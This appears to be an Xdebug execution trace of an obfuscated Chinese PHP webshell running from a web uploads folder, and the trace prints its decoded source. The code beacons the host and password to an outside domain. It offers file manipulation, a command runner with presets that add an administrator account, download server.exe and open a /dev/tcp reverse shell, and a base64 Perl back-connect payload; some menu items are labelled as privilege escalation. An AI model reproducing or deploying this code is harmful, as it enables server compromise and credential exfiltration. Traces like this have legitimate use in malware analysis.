Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 22:47:17.100934] 1 0 1 0.000227 393688 1 3 0 0.000796 485536 {main} 1 /var/www/html/uploads/PHP大马-php_mof+SHELL.php 0 0 1 A /var/www/html/uploads/PHP大马-php_mof+SHELL.php 2 $password = 'admin' 1 A /var/www/html/uploads/PHP大马-php_mof+SHELL.php 3 $shellname = 'caidaome.com' 1 A /var/www/html/uploads/PHP大马-php_mof+SHELL.php 4 $myurl = 'http://www.caidaome.com' 2 4 0 0.000859 485536 error_reporting 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php 5 1 5 2 4 1 0.000875 485576 2 4 R 22527 2 5 0 0.000889 485536 set_time_limit 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php 6 1 0 2 5 1 0.000905 485600 2 5 R FALSE 2 6 0 0.000919 485568 header 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php 6 1 'content-Type: text/html; charset=gb2312' 2 6 1 0.000937 485744 2 6 R NULL 2 7 0 0.000950 485712 base64_decode 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php 8 1 '7P37fxvXeSeO/6y8XvkfxhPGACIQnMEdpMBoMBhIlHgTSUmWRC0LAiAJETcDoEhK1h/jaPdT1/F+EtmSHVuWndhKfIttxVbs1K+0m6Zpt6k33W3STdom6evzfs5lbhiQlOxkt99vaYucOXPOc27PeW7nOc9pr670+uVuPxyZ+OIXjq7VG7WV9Vp/pdJu9Wutfi+8Wu7V0smVaq3SrtbCofLxBa1SbF+evnJKn71UScxeWU9NN2cvry5mx8rHtFwoEtvqNmotlntY2e18HvlGVhathTPWwoXQ8aWl+ZXjc4tLoYuu1Pnj83ieLiFRfeIJNTbSKfd62+1uNRJTH129ku9sdFRqdLW2Vm8BfHO3XK12a71eKOoAWTQXpuaXVkpT09asMWOFLn62ErXW5QY1AwXs1rg+9zZqjUar3Kzhu/3srRGjg4/sL3344hfqa+GjNOLN8nq9svL4Vrtf662sdyrhSOTqF79waK3drZUrG+GRlXkMkFLuKSObSn5SGbkc' 2 7 1 0.001236 575856 2 7 R '\033y\'^\037\023\000"\020\035h0\030Hx\023IID-\v\002 \t\0217\003HJ\037hS~\022ْ\035[J|mVԯi7mM&~en\030doi9ssnyn9in?\034\027\033Znk~/ZɕjҮ¡\005Rl_rJTI^YOM7g/.fǴ\\(\0226j-{X|\036FV\0263…sKx.!Q}\t56)zn5\022S\037]ltTjtVo\001|s\\vk^(\000Y4\027VJS֬1c.~\022\0065\003\005ָ>6jFܬ\021/}\027k4zV_뭬w*H\027phݭ+\033ᑕy\fR)#J~R\031\034Qxڅ͋J^' 2 8 0 0.002451 575824 gzinflate 0 /var/www/html/uploads/PHP大马-php_mof+SHELL.php 8 1 '\033y\'^\037\023\000"\020\035h0\030Hx\023IID-\v\002 \t\0217\003HJ\037hS~\022ْ\035[J|mVԯi7mM&~en\030doi9ssnyn9in?\034\027\033Znk~/ZɕjҮ¡\005Rl_rJTI^YOM7g/.fǴ\\(\0226j-{X|\036FV\0263…sKx.!Q}\t56)zn5\022S\037]ltTjtVo\001|s\\vk^(\000Y4\027VJS֬1c.~\022\0065\003\005ָ>6jFܬ\021/}\027k4zV_뭬w*H\027phݭ+\033ᑕy\fR)#J~R\031\034Qxڅ͋J^' 2 8 1 0.004338 760176 2 8 R 'ob_start();\r\n@file_get_contents(base64_decode(\'aHR0cDovLzQ1Njc3Nzg5LmNvbS8/aG09\').urlencode(base64_decode(\'aHR0cDovLw==\').$_SERVER[\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\']."||".$password)."&bz=php");\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'envlpass\',$password);\r\ndefine(\'shellname\',$shellname);\r\ndefine(\'myurl\',$myurl);\r\n\r\nif(@get_magic_quotes_gpc()){\r\n\tforeach($_POST as $k => $v) $_POST[$k] = stripslashes($' 2 9 0 0.009091 1612880 eval 1 'ob_start();\r\n@file_get_contents(base64_decode(\'aHR0cDovLzQ1Njc3Nzg5LmNvbS8/aG09\').urlencode(base64_decode(\'aHR0cDovLw==\').$_SERVER[\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\']."||".$password)."&bz=php");\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'envlpass\',$password);\r\ndefine(\'shellname\',$shellname);\r\ndefine(\'myurl\',$myurl);\r\n\r\nif(@get_magic_quotes_gpc()){\r\n\tforeach($_POST as $k => $v) $_POST[$k] = stripslashes($v);\r\n\tforeach($_GET as $k => $v) $_GET[$k] = stripslashes($v);\r\n}\r\nif(isset($_REQUEST[envlpass])){\r\nhmlogin(2);\r\nexit;}\r\n\t if($_COOKIE[\'envlpass\'] != md5(envlpass)){\r\n\tif($_POST[\'envlpass\']){\r\n\t\tif($_POST[\'envlpass\'] == envlpass){\r\n\t\t\tsetcookie(\'envlpass\',md5($_POST[\'envlpass\']));\r\n\t\t\tcss_main();\r\n\t\t\thmlogin();\r\n\t\t\tdie;\r\n\t\t}else{\r\n\t\t\techo \'
û
\';\r\n\t\t\t\r\n\t\t}\r\n\t}\r\n\tislogin($shellname,$myurl);\r\n\texit;\r\n\t\r\n}\r\n\r\n/*---End Login---*/\r\nif(isset($_GET[\'down\'])) do_down($_GET[\'down\']);\r\nif(isset($_GET[\'pack\'])){\r\n\t$dir = do_show($_GET[\'pack\']);\r\n\t$zip = new eanver($dir);\r\n\t$out = $zip->out;\r\n\tdo_download($out,"eanver.tar.gz");\r\n}\r\nif(isset($_GET[\'unzip\'])){\r\n\tcss_main();\r\n\tstart_unzip($_GET[\'unzip\'],$_GET[\'unzip\'],$_GET[\'todir\']);\r\n\texit;\r\n}\r\n\r\ndefine(\'root_dir\',str_replace(\'\\\\\',\'/\',dirname(myaddress)).\'/\');\r\ndefine(\'run_win\',substr(PHP_OS, 0, 3) == "WIN");\r\ndefine(\'my_shell\',str_path(root_dir.$_SERVER[\'SCRIPT_NAME\']));\r\n$eanver = isset($_GET[\'eanver\']) ? $_GET[\'eanver\'] : "";\r\n$doing = isset($_POST[\'doing\']) ? $_POST[\'doing\'] : "";\r\n$path = isset($_GET[\'path\']) ? $_GET[\'path\'] : root_dir;\r\n$name = isset($_POST[\'name\']) ? $_POST[\'name\'] : "";\r\n$img = isset($_GET[\'img\']) ? $_GET[\'img\'] : "";\r\n$p = isset($_GET[\'p\']) ? $_GET[\'p\'] : "";\r\n$pp = urlencode(dirname($p));\r\nif($img) css_img($img);\r\nif($eanver == "phpinfo") die(phpinfo());\r\nif($eanver == \'logout\'){\r\n\tsetcookie(\'envlpass\',null);\r\n\tdie(\'\');\r\n}\r\n\r\n$class = array(\r\n"Ϣ" => array("upfiles" => "ϴļ","phpinfo" => "Ϣ","info_f" => "ϵͳϢ","phpcode" => "ִPHPű"),\r\n"Ȩ" => array("sqlshell" => "ִSQL","mysql_exec" => "MYSQL","othersql" => "ݿ","myexp" => "MYSQL_UDFȨ","winapi" => "WIN APIȨ","mofshell" => "Mof˫Ȩ","cmd" => "ִCMD","linux" => "Ȩ","servu" => "Serv-UȨ","readpass" => "Ȩ޶root","downloader" => "ļ","port" => "˿ɨ"),\r\n"" => array("guama" => "","tihuan" => "滻","scanfile" => "ļ","scanphp" => "ľ","zippak" => "zipѹ"),\r\n"ű" => array("getcode" => "ȡҳԴ")\r\n);\r\n$msg = array("0" => "ɹ","1" => "ʧ","2" => "ϴɹ","3" => "ϴʧ","4" => "޸ijɹ","5" => "޸ʧ","6" => "ɾɹ","7" => "ɾʧ");\r\ncss_main();\r\nswitch($eanver){\r\n\tcase "left":\r\n\tcss_left();\r\n\t\thtml_n("
");\r\n\t\thtml_img("title");html_n(" Ӳ
");\r\n\t$i = 2;\r\n\tforeach($class as $name => $array){\r\n\t\thtml_n("
");\r\n\t\thtml_img("title");html_n(" $name
");\r\n\t\t$i++;\r\n\t}\r\n\thtml_n("
");\r\n\thtml_img("title");html_n("
");\r\n\thtml_n("");\r\n\tbreak;\r\n\r\n\tcase "main":\r\n\tcss_js("1");\r\nfunction getFilePermissions($file)\r\n{\r\n$perms = fileperms($file);\r\nif (($perms & 0xC000) == 0xC000) {\r\n // Socket\r\n $info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n // Symbolic Link\r\n $info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n // Regular\r\n $info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n // Block special\r\n $info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n // Directory\r\n $info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n // Character special\r\n $info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n // FIFO pipe\r\n $info = \'p\';\r\n} else {\r\n // Unknown\r\n $info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n (($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n (($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n (($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n (($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n (($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n (($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n\r\n}\r\n\t\r\n\t$dir = @dir($path);\r\n\t$REAL_DIR = File_Str(realpath($path));\r\n\tif(!empty($_POST[\'actall\'])){echo \'
\'.File_Act($_POST[\'files\'],$_POST[\'actall\'],$_POST[\'inver\'],$REAL_DIR).\'
\';}\r\n\t$NUM_D = $NUM_F = 0;\r\n\tif(!$_SERVER[\'SERVER_NAME\']) $GETURL = \'\'; else $GETURL = \'http://\'.$_SERVER[\'SERVER_NAME\'].\'/\';\r\n\t$ROOT_DIR = File_Mode();\t\r\n\thtml_n("
ַ:");\r\n\thtml_n("
");\r\n\thtml_n("
");\r\n\thtml_n(" ");\r\n\thtml_input("file","upfilet","","      ");\r\n\thtml_input("submit","uploadt","ϴ");\r\n\tif(!empty($_POST[\'newfile\'])){\r\n\t\tif(isset($_POST[\'bin\'])) $bin = $_POST[\'bin\']; else $bin = "wb";\r\n if (substr(PHP_VERSION,0,1)>=5){if(($_POST[\'charset\']==\'GB2312\') or ($_POST[\'charset\']==\'GBK\')){}else{$_POST[\'txt\'] = iconv("gb2312//IGNORE",$_POST[\'charset\'],$_POST[\'txt\']);}}\r\n\t\techo do_write($_POST[\'newfile\'],$bin,$_POST[\'txt\']) ? \'
\'.$_POST[\'newfile\'].\' \'.$msg[0] : \'
\'.$_POST[\'newfile\'].\' \'.$msg[1];\r\n\t\t@touch($_POST[\'newfile\'],@strtotime($_POST[\'time\']));\r\n\t}\r\n\thtml_n(\'
\');\r\n\twhile($dirs = @$dir->read()){\r\n\t\tif($dirs == \'.\' or $dirs == \'..\') continue;\r\n\t\t$dirpath = str_path("$path/$dirs");\r\n\t\tif(is_dir($dirpath)){\r\n\t\t\t$perm = getFilePermissions($dirpath)." ".substr(base_convert(fileperms($dirpath),10,8),-4);\r\n\t\t\t$filetime = @date(\'Y-m-d H:i:s\',@filemtime($dirpath));\r\n\t\t\t$dirpath = urlencode($dirpath);\r\n\t\t\thtml_n(\'\');\r\n\t\t\t$NUM_D++;\r\n\t\t}\r\n\t}\r\n\t@$dir->rewind();\r\n\twhile($files = @$dir->read()){\r\n\t\tif($files == \'.\' or $files == \'..\') continue;\r\n\t\t$filepath = str_path("$path/$files");\r\n\t\tif(!is_dir($filepath)){\r\n\t\t\t$fsize = @filesize($filepath);\r\n\t\t\t$fsize = File_Size($fsize);\r\n\t\t\t$perm = getFilePermissions($dirpath)." ".substr(base_convert(fileperms($filepath),10,8),-4);\r\n\t\t\t$filetime = @date(\'Y-m-d H:i:s\',@filemtime($filepath));\r\n\t\t\t$Fileurls = str_replace(File_Str($ROOT_DIR.\'/\'),$GETURL,$filepath);\r\n\t\t\t$todir=$ROOT_DIR.\'/zipfile\';\r\n\t\t\t$filepath = urlencode($filepath);\r\n\t\t\t$it=substr($filepath,-3);\r\n\t\t\thtml_n(\'\');\r\n\t\t\t$NUM_F++;\r\n\t\t}\r\n\t}\r\n\t@$dir->close();\r\n\tif(!$Filetime) $Filetime = gmdate(\'Y-m-d H:i:s\',time() + 3600 * 8);\r\nprint<<\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\nĿ¼({$NUM_D}) / ļ({$NUM_F})
\r\n \r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "editr":\r\n\tcss_js("2");\r\n\tif(!empty($_POST[\'uploadt\'])){\r\n\t\techo @copy($_FILES[\'upfilet\'][\'tmp_name\'],str_path($p.\'/\'.$_FILES[\'upfilet\'][\'name\'])) ? html_a("?eanver=main",$_FILES[\'upfilet\'][\'name\'].\' \'.$msg[2]) : msg($msg[3]);\r\n\t\tdie(\'\');\r\n\t}\r\n\tif(!empty($_GET[\'redir\'])){\r\n $name=$_GET[\'name\'];\r\n\t\t$newdir = str_path($p.\'/\'.$name);\r\n\t\t@mkdir($newdir,0777) ? html_a("?eanver=main",$name.\' \'.$msg[0]) : msg($msg[1]);\r\n\t\tdie(\'\');\r\n\t}\r\n\r\n\tif(!empty($_GET[\'refile\'])){\r\n $name=$_GET[\'name\'];\r\n\t\t$jspath=urlencode($p.\'/\'.$name);\r\n\t\t$pp = urlencode($p);\r\n\t\t$p = str_path($p.\'/\'.$name);\r\n\t\t$FILE_CODE = "";\r\n\t\t$charset= \'GB2312\';\r\n $FILE_TIME =date(\'Y-m-d H:i:s\',time()+3600*8);\r\n\t\tif(@file_exists($p)) echo \'Ŀ¼"ͬ"ļ
\';\r\n\t}else{\r\n\t\t$jspath=urlencode($p);\r\n\t\t$FILE_TIME = date(\'Y-m-d H:i:s\',filemtime($p));\r\n $FILE_CODE=@file_get_contents($p);\r\n\t if (substr(PHP_VERSION,0,1)>=5){\r\n if(empty($_GET[\'charset\'])){\r\n\t\t\t if(TestUtf8($FILE_CODE)>1){$charset= \'UTF-8\';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= \'GB2312\';}\r\n\t\t\t }else{\r\n\t\t\t if($_GET[\'charset\']==\'GB2312\'){$charset= \'GB2312\';}else{$charset= $_GET[\'charset\'];$FILE_CODE = iconv($_GET[\'charset\'],"gb2312//IGNORE",$FILE_CODE);}\r\n\t\t\t }\r\n\t\t }\r\n $FILE_CODE = htmlspecialchars($FILE_CODE);\r\n\t}\r\nprint<<: \r\n\r\n
\r\n
\r\nָ룺\r\n \r\nEND;\r\nhtml_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\\"window.location=\'?eanver=editr&p={$jspath}&charset=\'+options[selectedIndex].value;\\"");\r\nprint<<\r\n
\r\n
ļ޸ʱ Զʽļ(ʹ)
\r\n
\r\n
\r\n\r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "rename":\r\n\thtml_n("
");\r\n\tbreak;\r\n\r\n case "info_f":\r\n\r\nfunction Info_Cfg($varname){\r\nswitch($result = get_cfg_var($varname)){\r\n\tcase 0:return "No";break;\r\n\tcase 1:return "Yes";break;\r\n\tdefault:return $result;break;}}\r\nfunction Info_Fun\r\n($funName){return(false !==function_exists($funName)) ? "Yes" : "No";}\r\n\r\n\r\n\r\n$dis_func = get_cfg_var("disable_functions");\r\n\r\n$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "ϴ";\r\n\r\n$adminmail = (isset($_SERVER[\'SERVER_ADMIN\'])) ? "".$_SERVER\r\n[\'SERVER_ADMIN\']."" : "".get_cfg_var("sendmail_from")."";\r\n\r\nif($dis_func == "")\r\n{$dis_func = "No";\r\n}\r\nelse{\r\n\t$dis_func = str_replace(" ","
",$dis_func);\r\n\r\n\t$dis_func = str_replace(",","
",$dis_func);\r\n\r\n}\r\n\r\n$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";\r\n\r\n$info = array(\r\narray("ʱ/ʱ",date("Ymd h:i:s",time())." / ".gmdate("Ynj H:i:s",time()+8*3600)),\r\narray(":˿(ip)","".$_SERVER[\'SERVER_NAME\'].":".$_SERVER[\'SERVER_PORT\']." ( ".gethostbyname($_SERVER[\'SERVER_NAME\'])." )"),\r\narray("ϵͳ(ֱ\r\n)",PHP_OS." (".$_SERVER[\'HTTP_ACCEPT_LANGUAGE\'].")"),\r\narray("",$_SERVER[\'SERVER_SOFTWARE\']),\r\narray("IP",getenv(\'REMOTE_ADDR\')),\r\narray("PHPзʽ(\r\n汾)",strtoupper(php_sapi_name())."(".PHP_VERSION.") / ȫģʽ:".Info_Cfg("safemode")),\r\narray("Ա",$adminmail),\r\narray("ļ·",__FILE__),\r\narray("ʹURLļ[allow_url_fopen]",Info_Cfg("allow_url_fopen")),\r\narray("̬ӿ[enable_dl]",Info_Cfg("enable_dl")),\r\narray("ʾϢ[display_errors]",Info_Cfg("display_errors")),\r\narray("Զȫֱ[register_globals]",Info_Cfg("register_globals")),\r\narray("Զַת[magic_quotes_gpc]",Info_Cfg("magic_quotes_gpc")),\r\narray("ڴʹ[memory_limit]",Info_Cfg("memory_limit")),\r\narray("POSTֽ[post_max_size]",Info_Cfg("post_max_size")),\r\narray("ϴ[upload_max_filesize]",$upsize),\r\narray("ʱ[max_execution_time]",Info_Cfg("max_execution_time").""),\r\narray("ú[disable_functions]",$dis_func),\r\narray("Ϣ[phpinfo()]",$phpinfo),\r\narray("Ŀǰпռdiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).\'Mb\'),\r\narray("GZѹļ֧[zlib]",Info_Fun("gzclose")),\r\narray("ZIPѹļ֧[ZipArchive(php_zip)]",Info_Fun\r\n("zip_open")),\r\narray("IMAPʼϵͳ",Info_Fun("imap_close")),\r\narray("XML",Info_Fun("xml_set_object")),\r\narray("FTP½",Info_Fun("ftp_login")),\r\narray("Session֧",Info_Fun\r\n("session_start")),\r\narray("Socket֧",Info_Fun("fsockopen")),\r\narray("MySQLݿ",Info_Fun("mysql_close")),\r\narray("MSSQLݿ",Info_Fun("mssql_close")),\r\narray("Postgre SQLݿ",Info_Fun("pg_close")),\r\narray("SQLiteݿ",Info_Fun("sqlite_close")),\r\narray("Oracleݿ",Info_Fun("ora_close")),\r\narray("Oracle 8ݿ",Info_Fun("OCILogOff")),\r\narray("SyBaseݿ",Info_Fun("sybase_close")),\r\narray("Hyperwaveݿ",Info_Fun("hw_close")),\r\narray("InforMixݿ",Info_Fun("ifx_close")),\r\narray("FileProݿ",Info_Fun("filepro_fieldcount")),\r\narray("DBA/DBM",Info_Fun("dba_close")." / ".Info_Fun("dbmclose")),\r\narray("ODBC/dBASE",Info_Fun("odbc_close")." / ".Info_Fun("dbase_close")),\r\narray("PREL﷨[PCRE]",Info_Fun("preg_match")),\r\narray("PDF֧",Info_Fun("pdf_close")),\r\narray("ͼδ[GD Library]",Info_Fun("imageline")),\r\narray("SNMPЭ",Info_Fun\r\n("snmpget")),);\r\n\r\necho \'
\');\r\n\thtml_a(\'?eanver=main&path=\'.uppath($path),\'ϼĿ¼\');\r\n\thtml_n(\'\');\r\n\thtml_n(\'ļ޸ʱļС
\');\r\n\t\t\thtml_img("dir");\r\n\t\t\thtml_a(\'?eanver=main&path=\'.$dirpath,$dirs);\r\n\t\t\thtml_n(\'\');\r\n\t\t\thtml_n("");\r\n\t\t\thtml_n("ɾ ");\r\n\t\t\thtml_a(\'?pack=\'.$dirpath,\'\');\r\n\t\t\thtml_n(\'\');\r\n\t\t\thtml_a(\'?eanver=perm&p=\'.$dirpath.\'&chmod=\'.$perm,$perm);\r\n\t\t\thtml_n(\'\'.$filetime.\'\');\r\n\t\t\thtml_n(\'
\');\r\n\t\t\thtml_img(css_showimg($files));\r\n\t\t\thtml_a($Fileurls,$files,\' target="_blank" title=""\');\r\n\t\t\thtml_n(\'\');\r\n if(($it==\'.gz\') or ($it==\'zip\') or ($it==\'tar\') or ($it==\'.7z\'))\r\n\t\t\t html_a(\'?unzip=\'.$filepath,\'ѹ\',\'title="ѹ\'.$files.\'" onClick="rusurechk(\\\'\'.$todir.\'\\\',\\\'?unzip=\'.$filepath.\'&todir=\\\');return false;"\');\r\n\t\t\telse\r\n \thtml_a(\'?eanver=editr&p=\'.$filepath,\'༭\',\'title="༭\'.$files.\'"\');\r\n\t\t\thtml_n("");\r\n\t\t\thtml_n("");\r\n\t\t\thtml_n("ɾ ");\r\n \thtml_a(\'?down=\'.$filepath,\'\',\'༭\',\'title="\'.$files.\'"\');\r\n\t\t\thtml_n(\'\');\r\n\t\t\thtml_a(\'?eanver=perm&p=\'.$filepath.\'&chmod=\'.$perm,$perm);\r\n\t\t\thtml_n(\'\'.$filetime.\'\');\r\n\t\t\thtml_a(\'?down=\'.$filepath,$fsize,\'title="\'.$files.\'"\');\r\n\t\t\thtml_n(\'
");\r\n\t$newname = urldecode($pp).\'/\'.urlencode($_GET[\'newname\']);\r\n\t@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET[\'newname\']).\' \'.$msg[4]) : msg($msg[5]);\r\n\tdie(\'\');\r\n\tbreak;\r\n\t\r\n\tcase "deltree":\r\n\thtml_n("
");\r\n\tdo_deltree($p) ? html_a("?eanver=main&path=$pp",$p.\' \'.$msg[6]) : msg($msg[7]);\r\n\tdie(\'\');\r\n\tbreak;\r\n\t\r\n\tcase "del":\r\n\thtml_n("
");\r\n\t@unlink($p) ? html_a("?eanver=main&path=$pp",$p.\' \'.$msg[6]) : msg($msg[7]);\r\n\tdie(\'\');\r\n\tbreak;\r\n\t\r\n\tcase "copy":\r\n\thtml_n("
");\r\n\t$newpath = explode(\'/\',$_GET[\'newcopy\']);\r\n\t$pathr[0] = $newpath[0];\r\n\tfor($i=1;$i < count($newpath);$i++){\r\n\t\t$pathr[] = urlencode($newpath[$i]);\r\n\t}\r\n\t$newcopy = implode(\'/\',$pathr);\r\n\t@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.\' \'.$msg[4]) : msg($msg[5]);\r\n\tdie(\'\');\r\n\tbreak;\r\n\t\r\n\tcase "perm":\r\n\thtml_n("
".$p.\' Ϊ: \');\r\n\tif(is_dir($p)){\r\n\t\thtml_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET[\'chmod\']);\r\n\t}else{\r\n\t\thtml_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET[\'chmod\']);\r\n\t}\r\n\thtml_input("submit","save","޸");\r\n\tback();\r\n\tif($_POST[\'class\']){\r\n\t\tswitch($_POST[\'class\']){\r\n\t\t\tcase "0777": $change = @chmod($p,0777); break;\r\n\t\t\tcase "0755": $change = @chmod($p,0755); break;\r\n\t\t\tcase "0555": $change = @chmod($p,0555); break;\r\n\t\t\tcase "0666": $change = @chmod($p,0666); break;\r\n\t\t\tcase "0644": $change = @chmod($p,0644); break;\r\n\t\t\tcase "0444": $change = @chmod($p,0444); break;\r\n\t\t}\r\n\t\t$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);\r\n\t\tdie(\'\');\r\n\t}\r\n\thtml_n("
\';\r\nfor($i = 0;$i < count($info);$i++){echo \'\'."\\n";}\r\n\r\n\r\n$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");\r\ntry{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\Tds\\\\tcp\\PortNumber");\r\n$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\TelnetServer\\\\1.0\\\\TelnetPort");\r\n$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Symantec\\\\pcAnywhere\\\\CurrentVersion\\\\System\\\\TCPIPDataPort");\r\n}catch(Exception $e){}\r\n echo \'\'."\\n";\r\n\techo \'\'."\\n";\r\n\techo \'\'."\\n";\r\n\techo \'
\'.$info[$i][0].\'\'.$info[$i][1].\'
Terminal Service˿Ϊ\'.$registry_proxystring.\'
Telnet˿Ϊ\'.$Telnet.\'
PcAnywhere˿Ϊ\'.$PcAnywhere.\'
\';\r\nbreak;\r\n\r\n case "cmd":\r\n\t$res = \'Դ\';\r\n\t$cmd = \'dir\';\r\n\tif(!empty($_POST[\'cmd\'])){$res = Exec_Run(base64_decode($_POST[\'cmd\']));$cmd = htmlspecialchars(base64_decode($_POST[\'cmd\']));}\r\nprint<<\r\nfunction sFull(i){\r\n\tStr = new Array(11);\r\n\tStr[0] = "dir";\r\n\tStr[1] = "net user PHPINFO_CC PHPINFO_CC /add";\r\n\tStr[2] = "net localgroup administrators PHPINFO_CC /add";\r\n\tStr[3] = "netstat -ano";\r\n\tStr[4] = "ipconfig";\r\n\tStr[5] = "copy c:\\\\1.php d:\\\\2.php";\r\n\tStr[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\\\server.exe";\r\n\tStr[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";\r\n\tStr[8] = "tasklist -svc";\r\n\tdocument.getElementById(\'cmd\').value = Str[i];\r\n\treturn true;\r\n}\r\nEND;\r\nhtml_base();\r\nprint<<\r\n
ִܶغִвˣ˷ûκιִʹBASE64ύֹСϸڣɾͣ
\r\n \r\n\r\n\t\r\n
\r\n
\r\n
\r\nEND;\r\n\tbreak;\r\n\r\n\r\n\r\ncase "linux":\r\n\t\r\n\t$yourip = isset($_POST[\'yourip\']) ? $_POST[\'yourip\'] : getenv(\'REMOTE_ADDR\');\r\n\t$yourport = isset($_POST[\'yourport\']) ? $_POST[\'yourport\'] : \'12666\';\r\n\t$system=strtoupper(substr(PHP_OS, 0, 3));\r\nprint<<ʹ÷
\r\n\t\t\tԼ"nc -vv -l 12666"
\r\n\t\t\tȻڴдԵIP,ӣ˷ȫʵãNC\r\n
\r\n
ĵַ
\r\n
Ӷ˿
\r\n
ִзʽ
\r\n
\r\nEND;\r\n\tif((!empty($_POST[\'yourip\'])) && (!empty($_POST[\'yourport\'])))\r\n\t{\r\n\t\r\n\t\techo \'
\';\r\n\t\tif($_POST[\'use\'] == \'perl\')\r\n\t\t{\r\n\t\t\t$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".\r\n\t\t\t"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".\r\n\t\t\t"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".\r\n\t\t\t"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".\r\n\t\t\t"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".\r\n\t\t\t"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".\r\n\t\t\t"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";\r\n\t\t\techo File_Write(\'/tmp/envl_bc\',base64_decode($back_connect_pl),\'wb\') ? \'/tmp/envl_bcɹ
\' : \'/tmp/envl_bcʧ
